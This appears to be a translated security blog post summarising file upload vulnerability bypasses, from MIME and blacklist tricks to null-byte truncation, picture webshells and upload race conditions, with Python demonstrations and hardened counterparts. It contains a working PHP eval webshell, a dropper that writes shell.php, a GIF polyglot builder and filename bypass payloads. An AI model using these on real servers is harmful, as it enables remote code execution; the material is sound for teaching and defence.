A short summary of file upload vulnerabilities

For the upload-labs writeup see https://www.cnblogs.com/Qi-Lin/p/11296761.html

Bypassing the front-end check

A front-end check is JavaScript that runs in the browser, so it can be bypassed by deleting the JS check, by disabling JavaScript (in Burp's proxy options or directly in the browser), or by uploading an allowed file name and editing the intercepted request in Burp.

Bypassing the MIME type check

MIME (Multipurpose Internet Mail Extensions) types map a file extension to the way the file is opened; for example a .png upload carries Content-Type: image/png in the request. The server only sees the Content-Type the client declares, so the check is bypassed by intercepting the request in Burp and changing the Content-Type of the file part.
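
As an added example (not code from the page), the Python below builds the multipart upload a browser or Burp would send, parses it back the way a server does, and compares a check that trusts the part's Content-Type with one that sniffs the bytes. The boundary, the form field name and the whitelists are assumptions for illustration.

```python
import re

# Constructed request details; the boundary and field name are assumptions, not from the page.
BOUNDARY = "----WebKitFormBoundaryExample"
FIELD = "upload_file"


def build_upload_body(filename: str, declared_type: str, data: bytes) -> bytes:
    """Build the multipart/form-data body a browser sends. The part's Content-Type is
    whatever the client writes, so an attacker (or Burp) can set it freely."""
    head = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{FIELD}"; filename="{filename}"\r\n'
        f"Content-Type: {declared_type}\r\n"
        "\r\n"
    ).encode()
    return head + data + f"\r\n--{BOUNDARY}--\r\n".encode()


def parse_upload_body(body: bytes):
    """Minimal server-side multipart parser: (filename, declared Content-Type, bytes)
    of the first file part."""
    for chunk in body.split(f"--{BOUNDARY}".encode())[1:]:
        if chunk.startswith(b"--"):                      # closing boundary
            break
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in raw_headers.strip(b"\r\n").decode().split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if match:
            return match.group(1), headers.get("content-type", ""), data[:-2]  # drop CRLF before boundary
    raise ValueError("no file part")


ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif"}
ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_type(data: bytes):
    """Determine the type from the leading bytes, as finfo/libmagic would."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def check_by_header(body: bytes) -> bool:
    """The weak check: trust the client-supplied Content-Type of the part."""
    _, declared, _ = parse_upload_body(body)
    return declared in ALLOWED_TYPES


def check_by_content(body: bytes) -> bool:
    """The stronger check: ignore the header, sniff the bytes, and still whitelist the
    extension (magic bytes alone can be faked by prepending an image header)."""
    filename, _, data = parse_upload_body(body)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return sniff_type(data) in ALLOWED_TYPES and ext in ALLOWED_EXTS


if __name__ == "__main__":
    forged = build_upload_body("shell.php", "image/png", b"<?php phpinfo(); ?>")
    print("header check :", check_by_header(forged))    # passes: the bypass
    print("content check:", check_by_content(forged))   # rejected
```

The forged request is exactly what editing Content-Type in Burp produces: the header-based check accepts it, the content-based check does not.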

Bypassing a blacklist

A blacklist is less safe than a whitelist: there is nearly always an extension it does not cover.

  • If only php is blocked, upload the file as php3, php4, php5 or phtml instead (these execute only where the server is configured to parse them as PHP).
  • .htaccess bypass: .htaccess is an Apache per-directory configuration file that can set up 301 redirects, custom 404 pages, change how file extensions are handled, and block or allow access to specific directories or files. An uploaded .htaccess containing SetHandler application/x-httpd-php makes Apache parse every file in that directory as PHP. This requires AllowOverride All for that directory in httpd.conf.
  • Case bypass (1.PHP, 1.pHp): only applies on Windows, whose filesystem is case-insensitive, and only when the blacklist compare is case-sensitive.
  • Trailing-space bypass: on Windows a space after the extension is dropped when the file is saved, so "1.php " passes the blacklist and is stored as 1.php.
  • Trailing-dot bypass: Windows likewise removes a final dot, so "1.php." is stored as 1.php.
  • Special-symbol bypass: on Windows, uploading "1.php::$DATA" (an NTFS data stream name) produces a file 1.php on the server with the same content, and it is parsed as PHP.
  • Combination bypass, e.g. "1.php. ." (dot, space, dot), for code that strips a trailing dot or space only once.
  • If there is an upload size limit, upload a small file (a small webshell) first and use it to upload the larger file.
  • If the code replaces blacklisted strings with the empty string instead of rejecting the file, double-write the extension: "1.pphphp" becomes 1.php after one replacement.

Bypassing a whitelist

Null-byte truncation: when the system reads the file name it stops at a 0x00 byte. For example "1.php\0.jpg" looks like a .jpg upload to the whitelist check, but the file is saved as 1.php.
This was fixed in PHP 5.3 and later, and it is also affected by magic_quotes_gpc, which escapes the null byte the same way addslashes does.

  • GET truncation: put %00 in the URL parameter; the server URL-decodes it into a real null byte.

  • POST truncation: in a multipart body the file name is taken as-is, so %00 is not decoded; the raw 0x00 byte has to be inserted into the request, e.g. in Burp's hex editor.
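
The blacklist bypasses and the null-byte whitelist bypass above all exploit the same gap: the name the check inspects is not the name the operating system finally stores. The Python below is an added example (not code from the page) that models the naive checks, the Windows and C-level name normalisation, and a hardened check side by side; the lists and function names are assumptions for illustration.

```python
import re
from typing import Optional

# Assumed lists for illustration; real applications differ.
BLACKLIST = ("php", "php3", "php4", "php5", "phtml", "htaccess")
WHITELIST = ("jpg", "jpeg", "png", "gif")


def naive_ext(name: str) -> str:
    """Extension as naive upload code computes it: everything after the last dot, untouched."""
    return name.rsplit(".", 1)[1] if "." in name else ""


def naive_blacklist_allows(name: str) -> bool:
    """Case-sensitive blacklist on the raw extension: no trim, no special-name handling."""
    return naive_ext(name) not in BLACKLIST


def strip_filter(name: str) -> str:
    """Filter that deletes blacklisted substrings (str_ireplace(..., '')) instead of
    rejecting. One pass over '1.pphphp' leaves '1.php'."""
    for bad in BLACKLIST:
        name = re.sub(re.escape(bad), "", name, flags=re.IGNORECASE)
    return name


def windows_saved_name(name: str) -> str:
    """Name Windows/NTFS actually stores: '::$DATA' selects the default data stream
    (the file itself) and trailing dots and spaces are dropped."""
    if name.endswith("::$DATA"):
        name = name[: -len("::$DATA")]
    return name.rstrip(". ")


def c_saved_name(name: str) -> str:
    """Name the C-level filesystem call opens on old PHP: the string ends at 0x00."""
    return name.split("\x00", 1)[0]


def whitelist_allows(name: str) -> bool:
    """Whitelist check done in PHP on the full string; it still sees 'jpg' after the null byte."""
    return naive_ext(name).lower() in WHITELIST


def hardened_saved_name(name: str, basename: str = "upload") -> Optional[str]:
    """Hardened version: reject null bytes, stream names and trailing dots/spaces,
    whitelist the normalised extension, and never reuse the client's basename."""
    if "\x00" in name or "::" in name or name != name.rstrip(". "):
        return None
    ext = naive_ext(name).lower()
    if ext not in WHITELIST:
        return None
    return f"{basename}.{ext}"


def bypass_table():
    """(payload, naive blacklist passes?, name stored on Windows) for the page's payloads."""
    payloads = ["1.php", "1.PHP", "1.php ", "1.php.", "1.php::$DATA", "1.php. ."]
    return [(p, naive_blacklist_allows(p), windows_saved_name(p)) for p in payloads]


if __name__ == "__main__":
    for row in bypass_table():
        print(row)
    print(strip_filter("1.pphphp"), c_saved_name("1.php\x00.jpg"), hardened_saved_name("photo.JPG"))
```

Every payload except plain 1.php slips past the naive blacklist and still lands on disk as 1.php; the hardened function rejects all of them and only ever writes a server-chosen name with a whitelisted extension.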

Picture webshell

Using a picture webshell requires a file inclusion vulnerability, because PHP's include, include_once, require and require_once functions execute whatever they include as PHP code, whatever the file name is.

  • Put the image's magic header in front of the code, at its simplest:
GIF89a
<?php
phpinfo();
?>
  • The trojan can also be appended after the picture's terminator byte, or hidden in a real image with steganography.
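
As an added example (not from the page), the Python below builds a picture webshell the way the second bullet describes: a real 1x1 GIF, constructed here, with the PHP trojan appended after the trailer byte. A small GIF block-walker shows why the bare GIF89a header from the first bullet passes a magic-byte check but not an image parser, while the appended payload survives both. The payload and function names are assumptions.

```python
import re

# 1x1 transparent GIF89a, 43 bytes, constructed for this example.
GIF_1x1 = bytes.fromhex(
    "474946383961"          # "GIF89a"
    "01000100800000"        # 1x1, packed 0x80 (global colour table, 2 entries), bg, aspect
    "000000ffffff"          # colour table: black, white
    "21f9040100000000"      # graphic control extension (transparent index 0) + block end
    "2c000000000100010000"  # image descriptor: 1x1 at (0,0), no local colour table
    "0202440100"            # LZW min code size 2, one 2-byte sub-block, block end
    "3b"                    # trailer
)
PAYLOAD = b'<?php @eval($_POST["pass"]); ?>'   # assumed trojan


def gif_trailer_offset(data: bytes) -> int:
    """Walk the GIF block structure like an image library would and return the offset of
    the trailer byte 0x3B. Raises ValueError for anything that is not a complete GIF."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 13:
        raise ValueError("bad header")

    def skip_subblocks(p: int) -> int:
        while data[p] != 0:
            p += 1 + data[p]
        return p + 1

    try:
        packed = data[10]
        pos = 13 + (3 * (2 << (packed & 7)) if packed & 0x80 else 0)
        while True:
            block = data[pos]
            if block == 0x3B:
                return pos
            if block == 0x21:                      # extension: label byte, then sub-blocks
                pos = skip_subblocks(pos + 2)
            elif block == 0x2C:                    # image descriptor (+ optional local table)
                ipacked = data[pos + 9]
                pos += 10 + (3 * (2 << (ipacked & 7)) if ipacked & 0x80 else 0)
                pos = skip_subblocks(pos + 1)      # +1 skips the LZW minimum code size
            else:
                raise ValueError(f"unknown block {block:#x}")
    except IndexError:
        raise ValueError("truncated") from None


def is_valid_gif(data: bytes) -> bool:
    """What a server that re-parses the image (getimagesize-style) effectively asks."""
    try:
        gif_trailer_offset(data)
        return True
    except ValueError:
        return False


def passes_magic_check(data: bytes) -> bool:
    """The weakest image check: only the first bytes are compared."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def make_picture_webshell(image: bytes, payload: bytes) -> bytes:
    """Append the PHP payload after the trailer. Image decoders stop at the trailer;
    PHP's include() does not, it executes every <?php ... ?> segment in the file."""
    end = gif_trailer_offset(image) + 1
    return image[:end] + payload


def php_code_segments(data: bytes):
    """The segments the PHP interpreter would execute from this file; bytes outside the
    tags are echoed as output, not executed."""
    return re.findall(rb"<\?php.*?\?>", data, flags=re.S)


if __name__ == "__main__":
    shell = make_picture_webshell(GIF_1x1, PAYLOAD)
    bare = b"GIF89a\n<?php phpinfo(); ?>"
    print(is_valid_gif(bare), is_valid_gif(shell))   # header-only fails a parser, polyglot passes
    print(php_code_segments(shell))
```

The header-only file is enough against a magic-byte or Content-Type check; against a server that actually decodes the image, the full polyglot is needed, and it still has to be included through a file inclusion bug to execute.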

Exploiting a race condition in uploads

  • Some code saves the upload first and only then inspects and renames it: if the site allows any file to be uploaded, it may check the saved file for a webshell and unlink it when one is found, or unlink it when the type is not the expected one. So if the uploaded file is requested before it is deleted, the code in it executes.
  • For example, write the following into the uploaded file; when it runs once, it creates a new file shell.php containing the trojan, which survives after the upload itself is deleted:
<?php
fputs(fopen('shell.php', 'w'), '<?php @eval($_POST["pass"]); ?>');
?>
  • While uploading, keep sending HTTP requests for the file, e.g. with a Python script:
import requests

url = "http://target/upload/1.php"  # placeholder: the URL of the uploaded file
while True:
    requests.get(url)
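
The race described above, as an added example that is not the page's code: instead of a live server it simulates the vulnerable save-then-check upload handler and a hardened one in a single process, with the attacker's request loop as a thread reading the file the way the web server would. The delay, the content check and the names are assumptions.

```python
import os
import tempfile
import threading
import time

# Constructed upload content: the same one-liner the page uses as the trojan.
WEBSHELL = b'<?php @eval($_POST["pass"]); ?>'
CHECK_DELAY = 0.05   # assumed time the server spends inspecting the saved file


def content_is_malicious(data: bytes) -> bool:
    return b"<?php" in data


def vulnerable_upload(webroot: str, name: str, data: bytes) -> bool:
    """Save into the web root first, inspect afterwards, unlink on failure (the vulnerable
    order). During CHECK_DELAY the file is reachable at its final URL."""
    path = os.path.join(webroot, name)
    with open(path, "wb") as f:
        f.write(data)
    time.sleep(CHECK_DELAY)
    if content_is_malicious(data):
        os.unlink(path)
        return False
    return True


def safe_upload(webroot: str, name: str, data: bytes) -> bool:
    """Inspect a temporary copy outside the web root; only a file that passed is moved
    in, atomically, under its final name. There is no window in which a rejected
    file is reachable."""
    fd, tmp = tempfile.mkstemp(prefix="quarantine-")   # system temp dir, not the web root
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    time.sleep(CHECK_DELAY)
    if content_is_malicious(data):
        os.unlink(tmp)
        return False
    os.replace(tmp, os.path.join(webroot, name))
    return True


def race(upload_fn):
    """Attacker thread hammering the expected path while the upload is processed, as the
    requests loop above would against a live server. Returns the content it managed to
    read (what the web server would have executed), or None."""
    with tempfile.TemporaryDirectory() as webroot:
        target = os.path.join(webroot, "shell.php")
        got = []
        stop = threading.Event()

        def hammer():
            while not stop.is_set():
                try:
                    with open(target, "rb") as f:
                        data = f.read()
                except FileNotFoundError:
                    continue
                if data:                   # skip the instant between create and write
                    got.append(data)
                    return

        t = threading.Thread(target=hammer)
        t.start()
        upload_fn(webroot, "shell.php", WEBSHELL)
        stop.set()
        t.join()
        return got[0] if got else None


if __name__ == "__main__":
    print("vulnerable:", race(vulnerable_upload))   # the webshell bytes are read in the window
    print("safe      :", race(safe_upload))         # None: the file never appears
```

The fix is the order of operations, not a faster check: validate in a location the web server cannot serve, then move the file into place only after it passed.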

Source: www.cnblogs.com/Qi-Lin/p/11297452.html